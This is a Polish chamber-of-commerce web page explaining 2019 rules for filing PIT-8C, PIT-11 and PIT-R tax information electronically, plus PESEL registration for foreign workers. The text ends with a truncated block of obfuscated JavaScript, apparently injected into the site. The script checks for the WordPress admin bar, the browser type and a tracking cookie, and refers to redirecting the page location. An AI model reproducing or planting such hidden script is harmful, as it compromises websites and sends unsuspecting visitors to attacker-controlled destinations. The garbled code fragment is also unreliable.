Zmiany przepisów prawa podatkowego PIT-8C, PIT-11, PIT-R | Północna Izba Gospodarcza w Koszalinie

Uprzejmie informujemy, że na stronie internetowej https://www.podatki.gov.pl/ znajdą Państwo wszelkie informacje.

Formularze można  przesłać za pomocą:

 1. Formularza interaktywnego Ministerstwa Finansów

Aby to zrobić należy:

 • wejść na stronę e-Deklaracje/Złoż e-deklaracje
 • pobrać odpowiedni formularz dotyczący wybranego podatku
 • wypełnić formularz
 • podpisać go podpisem kwalifikowanym albo danymi autoryzującymi
 • i wysłać
 1. Modułu finansowo-księgowego

Przy wykorzystaniu odpowiednich aplikacji (modułów) można wysyłać deklaracje drogą elektroniczną, bezpośrednio z systemów finansowo-księgowych oraz automatycznie podpisać elektronicznie wszystkie przesyłane deklaracje.

Aby to zrobić należy:

 1. Uniwersalnej Bramki Dokumentów (UBD)

Aby to zrobić należy:

 • uruchomić odpowiednią aplikację (moduł) zgodnie ze specyfikacją Wejścia – Wyjścia  dostępną w zakładce – Dokumentacja IT
 • wypełnić formularz
 • podpisać go podpisem kwalifikowanym albo danymi autoryzującymi
 • wysłać dokument do UBD

W ten sposób można przesłać jednocześnie do 20 tys. deklaracji.

Należy pobrać i zachować Urzędowe Poświadczenia Odbioru (UPO).
Korekty deklaracji nie można  złożyć za pomocą bramki UBD. Można wysłać tylko jako pojedynczy dokument do systemu e-Deklaracje.

Więcej informacji o UBD znajduje się zakładce Uniwersalna Bramka Dokumentów.

Jak udzielić pełnomocnictwa

Należy wypełnić i dostarczyć do urzędu skarbowego druk UPL-1. Możesz to zrobić:

 • papierowo – we właściwym urzędzie skarbowym
 • elektronicznie – przekaż przez ePUAP

Jedno pełnomocnictwo pozwala złożyć informację, roczne rozliczenie podatku we wszystkich urzędach skarbowych.

Informacje o pełnomocnictwach oraz aktualne formularze znajdują się w zakładce Pełnomocnictwa.

 

Zmiany w ustawie o podatku dochodowym od osób fizycznych od 1 stycznia 2019 r.

 • informacje o dochodach zatrudnionych osób fizycznych za 2018 r. należy wysyłać do urzędu skarbowego wyłącznie elektronicznie
 • informacje PIT-8C, PIT-11, PIT-R do urzędu skarbowego przekazujesz do 31 stycznia 2019 r.

Na przesłanie informacji pracownikowi jest czas do końca lutego.

Do urzędu skarbowego składane są informacje o wypłaconych w 2018 r. wynagrodzeniach wyłącznie elektronicznie na właściwych wzorach formularzy:

Nie zmienia się termin składania rocznej deklaracji PIT-4R(wariant 8), PIT-8AR(wariant 7) – należy złożyć do 31 stycznia. Natomiast informację IFT-1/IFT-1R(wariant 14) – do 28 lutego.
Wskazane wyżej terminy nie dotyczą płatnika, który kończy prowadzić działalność. W takim przypadku formularze należy złożyć do dnia zaprzestania działalności.

Informacje należy przekazać na aktualnie obowiązującej wersji formularza.
Oznaczenie wersji znajduje się w prawym dolnym rogu formularza.

Formularze można podpisać:

 • podpisem kwalifikowanym – wszystkie formularze
 • danymi autoryzującymi – formularze: PIT-8C, PIT-11, IFT-1/IFT-1R, PIT-4R, PIT-8AR

Wypełniając PIT-11, PIT-8C i PIT-R za 2018 r. – należy pamiętać o poprawnym numerze NIP pracodawcy oraz numerze PESEL pracownika .
Umożliwi to przygotowanie dla pracownika poprawnego zeznania podatkowego PIT-37 lub PIT-38 za rok 2018 – Twój e-PIT.

Jeśli pracownik jest obcokrajowcem i zamieszkuje na terytorium naszego kraju, powinien posiadać identyfikator podatkowy PESEL. Rejestracją danych w rejestrze PESEL zajmują się organy gminy, które są właściwe do:

 • zameldowania na pobyt stały i czasowy cudzoziemca,
 • złożenia wniosku o nadanie numeru PESEL[1].

Cudzoziemcy, którzy są obywatelami państwa członkowskiego Unii Europejskiej, państwa członkowskiego Europejskiego Porozumienia o Wolnym Handlu (EFTA) – strony umowy o Europejskim Obszarze Gospodarczym lub Konfederacji Szwajcarskiej oraz członkowie ich rodzin zamieszkujący w Polsce, mają obowiązek zameldować się w miejscu pobytu stałego lub czasowego najpóźniej w 30. dniu, licząc od dnia przybycia do tego miejsca. Natomiast pozostali cudzoziemcy powinni się zameldować najpóźniej w ciągu 4. dni[2].

Z kolei cudzoziemcy, których pobyt na terenie Polski nie przekracza 30. dni, są zwolnieni z obowiązku meldunkowego[3].

 Przypisy:
[1] w stosunku do osób, o których mowa w art. 7 ust. 2 ustawy o ewidencji ludności, dalej „ustawy”
[2] art. 41 ustawy
[3] art. 42 ust. 2 ustawy

Podstawa prawna
Ustawa z dnia 24 września 2010 r. o ewidencji ludności (Dz.U. 2018 poz. 1382, z późn. zm.)

  'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m